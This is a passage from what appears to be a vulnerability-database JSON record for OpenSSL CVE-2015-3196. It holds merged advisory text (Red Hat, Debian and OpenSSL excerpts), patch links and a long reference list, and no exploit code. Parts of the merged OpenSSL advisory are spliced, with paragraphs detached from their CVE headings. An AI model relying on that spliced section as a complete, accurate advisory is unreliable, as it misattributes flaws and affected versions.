xmlFAParserPosCharGroup\n1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat\n1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar\n1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass\n1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert\n1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates\n1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI\n1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.0.1e-2+deb7u18. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1k-3+deb8u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2e-1 or earlier. \n\nNOTE: WE ANTICIPATE THAT 1.0.0t AND 0.9.8zh WILL BE THE LAST RELEASES FOR THE\n0.9.8 AND 1.0.0 VERSIONS AND THAT NO MORE SECURITY FIXES WILL BE PROVIDED (AS\nPER PREVIOUS ANNOUNCEMENTS). USERS ARE ADVISED TO UPGRADE TO LATER VERSIONS. \n\nBN_mod_exp may produce incorrect results on x86_64 (CVE-2015-3193)\n==================================================================\n\nSeverity: Moderate\n\nThere is a carry propagating bug in the x86_64 Montgomery squaring procedure. No\nEC algorithms are affected. Analysis suggests that attacks against RSA and DSA\nas a result of this defect would be very difficult to perform and are not\nbelieved likely. Attacks against DH are considered just feasible (although very\ndifficult) because most of the work necessary to deduce information\nabout a private key may be performed offline. The amount of resources\nrequired for such an attack would be very significant and likely only\naccessible to a limited number of attackers. An attacker would\nadditionally need online access to an unpatched system using the target\nprivate key in a scenario with persistent DH parameters and a private\nkey that is shared between multiple clients. For example this can occur by\ndefault in OpenSSL DHE based SSL/TLS ciphersuites. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\n\nThis issue was reported to OpenSSL on August 13 2015 by Hanno\nB\u00f6ck. The fix was developed by Andy Polyakov of the OpenSSL\ndevelopment team. \n\nCertificate verify crash with missing PSS parameter (CVE-2015-3194)\n===================================================================\n\nSeverity: Moderate\n\nThe signature verification routines will crash with a NULL pointer dereference\nif presented with an ASN.1 signature using the RSA PSS algorithm and absent\nmask generation function parameter. Since these routines are used to verify\ncertificate signature algorithms this can be used to crash any certificate\nverification operation and exploited in a DoS attack. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\nOpenSSL 1.0.1 users should upgrade to 1.0.1q\n\nThis issue was reported to OpenSSL on August 27 2015 by Lo\u00efc Jonas Etienne\n(Qnective AG). The fix was developed by Dr. Stephen Henson of the OpenSSL\ndevelopment team. This structure is used by the PKCS#7 and CMS routines so any\napplication which reads PKCS#7 or CMS data from untrusted sources is affected. \nSSL/TLS is not affected. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\nOpenSSL 1.0.1 users should upgrade to 1.0.1q\nOpenSSL 1.0.0 users should upgrade to 1.0.0t\nOpenSSL 0.9.8 users should upgrade to 0.9.8zh\n\nThis issue was reported to OpenSSL on November 9 2015 by Adam Langley\n(Google/BoringSSL) using libFuzzer. The fix was developed by Dr. Stephen\nHenson of the OpenSSL development team. \n\nThis issue was fixed in OpenSSL 1.0.2d and 1.0.1p but has not been previously\nlisted in an OpenSSL security advisory. This issue also affects OpenSSL 1.0.0\nand has not been previously fixed in an OpenSSL 1.0.0 release. \n\nThe fix was developed by Dr. Stephen Henson of the OpenSSL development team. \n\nAnon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794)\n============================================================\n\nSeverity: Low\n\nIf a client receives a ServerKeyExchange for an anonymous DH ciphersuite with\nthe value of p set to 0 then a seg fault can occur leading to a possible denial\nof service attack. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\n\nThis issue was reported to OpenSSL on August 3 2015 by Guy Leaver (Cisco). The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nversions will be provided after that date. In the absence of significant\nsecurity issues being identified prior to that date, the 1.0.0t and 0.9.8zh\nreleases will be the last for those versions. Users of these versions are\nadvised to upgrade. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20151203.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-3196" }, { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "BID", "id": "78622" }, { "db": "VULMON", "id": "CVE-2015-3196" }, { "db": "PACKETSTORM", "id": "134652" }, { "db": "PACKETSTORM", "id": "141239" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134632" }, { "db": "PACKETSTORM", "id": "169632" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3196", "trust": 3.5 }, { "db": "BID", "id": "78622", "trust": 2.0 }, { "db": "JUNIPER", "id": "JSA10761", "trust": 2.0 }, { "db": "SECTRACK", "id": "1034294", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40100", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU95113540", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006117", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201512-076", "trust": 0.6 }, { "db": "MCAFEE", "id": "SB10203", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-3196", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134652", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "141239", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134782", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134859", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134632", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169632", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3196" }, { "db": "BID", "id": "78622" }, { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "PACKETSTORM", "id": "134652" }, { "db": "PACKETSTORM", "id": "141239" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134632" }, { "db": "PACKETSTORM", "id": "169632" }, { "db": "CNNVD", "id": "CNNVD-201512-076" }, { "db": "NVD", "id": "CVE-2015-3196" } ] }, "id": "VAR-201512-0485", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.43503637333333334 }, "last_update_date": "2024-07-23T21:00:45.295000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "OpenSSL 1.0.0 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.0-notes.html" }, { "title": "Release Strategy", "trust": 0.8, "url": "https://www.openssl.org/policies/releasestrat.html" }, { "title": "Fix PSK handling.", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=3c66a669dfc7b3792f7af0758ea26fe8502ce70c" }, { "title": "Race condition handling PSK identify hint (CVE-2015-3196)", "trust": 0.8, "url": "http://openssl.org/news/secadv/20151203.txt" }, { "title": "Oracle Critical Patch Update Advisory - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "title": "Oracle Critical Patch Update CVSS V2 Risk Matrices - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016verbose-2881709.html" }, { "title": "Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "title": "April 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2016_critical_patch_update" }, { "title": "OpenSSL Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=58938" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152617 - security advisory" }, { "title": "Red Hat: CVE-2015-3196", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3196" }, { "title": "Debian Security Advisories: DSA-3413-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=82bedc073c0f22b408ebaf092ed8621c" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2830-1" }, { "title": "Amazon Linux AMI: ALAS-2015-614", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-614" }, { "title": "Forcepoint Security Advisories: CVE-2015-3194, 3195, 3196 -- Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=62ab21cc073446940abce12c35db3049" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (December 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151204-openssl" }, { "title": "Symantec Security Advisories: SA105 : OpenSSL Vulnerabilities 3-Dec-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=a924415f718a299b2d1e8046890941f3" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-3196 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3196" }, { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "CNNVD", "id": "CNNVD-201512-076" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-362", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "NVD", "id": "CVE-2015-3196" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.debian.org/security/2015/dsa-3413" }, { "trust": 2.1, "url": "http://openssl.org/news/secadv/20151203.txt" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "trust": 2.0, "url": "http://www.fortiguard.com/advisory/openssl-advisory-december-2015" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2015-2617.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2830-1" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40100" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=145382583417444\u0026w=2" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04944173" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/78622" }, { "trust": 1.7, "url": "http://fortiguard.com/advisory/openssl-advisory-december-2015" }, { "trust": 1.7, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151204-openssl" }, { "trust": 1.7, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2015\u0026m=slackware-security.754583" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-december/173801.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00070.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00071.html" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05398322" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1034294" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=3c66a669dfc7b3792f7af0758ea26fe8502ce70c" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3196" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95113540/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3196" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=3c66a669dfc7b3792f7af0758ea26fe8502ce70c" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05398322" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3193" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1794" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-3196" }, { "trust": 0.3, "url": "https://kb.netapp.com/support/index?page=content\u0026id=9010051\u0026actp=rss" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1288326" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10203" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/dec/23" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04944173" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023836" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023987" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099426" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021091" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979528" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000128" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005702" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974459" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976148" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977265" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978085" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978238" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978239" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979086" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980207" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980965" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981612" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982877" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983532" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000058" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory15.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982347" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3194" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/362.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2617" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2830-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=42531" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.16" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu11.5" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2d-0ubuntu1.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.32" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3194" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3193" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3195" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://openssl.org/news/secadv_20151203.txt" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1794" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6808" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1838" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1839" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4483" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-8612" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3185" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1833" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4449" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5420" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3627" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2012-1148" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1837" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5419" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4447" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-7141" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.openssl.org/about/secpolicy.html" }, { "trust": 0.1, "url": "https://www.openssl.org/about/releasestrat.html)," }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20151203.txt" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3196" }, { "db": "BID", "id": "78622" }, { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "PACKETSTORM", "id": "134652" }, { "db": "PACKETSTORM", 